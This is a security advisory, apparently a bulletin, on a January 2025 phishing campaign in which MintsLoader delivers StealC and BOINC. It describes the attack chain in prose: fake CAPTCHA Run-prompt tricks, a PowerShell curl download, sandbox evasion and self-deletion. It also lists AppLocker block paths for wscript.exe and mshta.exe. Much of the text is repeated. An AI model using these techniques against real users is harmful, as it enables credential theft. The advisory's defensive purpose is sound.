MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks
Summary:
In early January 2025, threat hunters from eSentire detected and analyzed an ongoing threat campaign that utilizes the malware loader, MintsLoader, to deliver secondary payloads that include the StealC information stealer and BOINC, a legitimate open-source network computing platform. MintsLoader is a PowerShell-based loader that eSentire observed being delivered via email phishing spam that contains either a link to Kongtuke/ClickFix pages or a JScript file. The critical sectors targeted by this campaign are Energy and Legal Services in the US and Europe. The attack chain witnessed by eSentire begins with a link in a spam email as the initial infection vector. This link downloads an obfuscated JavaScript file which is responsible for running a PowerShell command to download MintsLoader via curl and then it deletes itself to avoid post-exploitation analysis. In alternate attack chains, the victim is redirected to ClickFix-style pages that lead to the delivery of MintsLoader utilizing the Windows Run prompt. MintsLoader contacts the threat actor’s C2 server to fetch PowerShell payloads that perform various checks to evade sandbox analysis. This attack ultimately deploys StealC which, notably, can avoid targeting machines in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan if desired.
Security Officer Comments:
The use of the ClickFix/KongTuke technique in these attacks is interesting as this campaign arises amidst a spike in malicious campaigns that were also utilizing the ClickFix/KongTuke technique by tricking users into running malicious commands on their machine via fake CAPTCHA prompts. The use of this technique in multiple campaigns highlights its effectiveness and increased adoption in cyberattacks. StealC has been sold to affiliates under the Malware-as-a-Service model since early 2023. Its codebase has been assessed as an offshoot of a stealer malware known as Arkei. The implementation of various checks and the deletion of files to remove indicators of their intrusion activity underscore the sophistication of this attack chain.
Suggested Corrections:
IOCs are available here.
The increase in remote work has increased reliance on email as a vital communication mechanism. These conditions thereby also increase the risk of personnel being targeted by phishing or spam attacks, and thus ransomware and other malware infections. End users should adhere to the following recommendations:
https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html
https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery
https://x.com/CERTCyberdef/status/1849392561024065779
In early January 2025, threat hunters from eSentire detected and analyzed an ongoing threat campaign that utilizes the malware loader, MintsLoader, to deliver secondary payloads that include the StealC information stealer and BOINC, a legitimate open-source network computing platform. MintsLoader is a PowerShell-based loader that eSentire observed being delivered via email phishing spam that contains either a link to Kongtuke/ClickFix pages or a JScript file. The critical sectors targeted by this campaign are Energy and Legal Services in the US and Europe. The attack chain witnessed by eSentire begins with a link in a spam email as the initial infection vector. This link downloads an obfuscated JavaScript file which is responsible for running a PowerShell command to download MintsLoader via curl and then it deletes itself to avoid post-exploitation analysis. In alternate attack chains, the victim is redirected to ClickFix-style pages that lead to the delivery of MintsLoader utilizing the Windows Run prompt. MintsLoader contacts the threat actor’s C2 server to fetch PowerShell payloads that perform various checks to evade sandbox analysis. This attack ultimately deploys StealC which, notably, can avoid targeting machines in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan if desired.
Security Officer Comments:
The use of the ClickFix/KongTuke technique in these attacks is interesting as this campaign arises amidst a spike in malicious campaigns that were also utilizing the ClickFix/KongTuke technique by tricking users into running malicious commands on their machine via fake CAPTCHA prompts. The use of this technique in multiple campaigns highlights its effectiveness and increased adoption in cyberattacks. StealC has been sold to affiliates under the Malware-as-a-Service model since early 2023. Its codebase has been assessed as an offshoot of a stealer malware known as Arkei. The implementation of various checks and the deletion of files to remove indicators of their intrusion activity underscore the sophistication of this attack chain.
Suggested Corrections:
IOCs are available here.
The increase in remote work has increased reliance on email as a vital communication mechanism. These conditions thereby also increase the risk of personnel being targeted by phishing or spam attacks, and thus ransomware and other malware infections. End users should adhere to the following recommendations:
- Do not open emails or download software from untrusted sources.
- Do not click on links or attachments in emails that come from unknown senders.
- Do not supply passwords, personal information, or financial information via email to anyone (sensitive information is also used for double extortion).
- Always verify the email sender's email address, name, and domain.
- Protect devices using antivirus, anti-spam, and anti-spyware software.
- Report phishing emails to the appropriate security or IT staff immediately.
- Disable the Run prompt via GPO:
- User Configuration > Administrative Templates > Start Menu and Taskbar > Enable “Remove Run menu from Start Menu”
- Disable wscript.exe via AppLocker GPO or Windows Defender Application Control (WDAC):
- C:\Windows\System32\WScript.exe
- C:\Windows\Syswow64\WScript.exe
- :\Windows\System32\WScript.exe ( represents wildcard to include other drive letter rather than C drive)
- :\Windows\SysWOW64\WScript.exe ( represents wildcard to include other drive letter rather than C drive)
- Disable mshta.exe via AppLocker GPO or Windows Defender Application Control (WDAC):
- C:\Windows\System32\mshta.exe
- C:\Windows\Syswow64\mshta.exe
- :\Windows\System32\mshta.exe ( represents wildcard to include other drive letter rather than C drive)
- :\Windows\SysWOW64\mshta.exe ( represents wildcard to include other drive letter rather than C drive)
- Employ email filtering and protection measures.
- Use a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) solution to detect and contain threats.
- Implement a Phishing and Security Awareness Training (PSAT) program that educates and informs your employees.
https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html
https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery
https://x.com/CERTCyberdef/status/1849392561024065779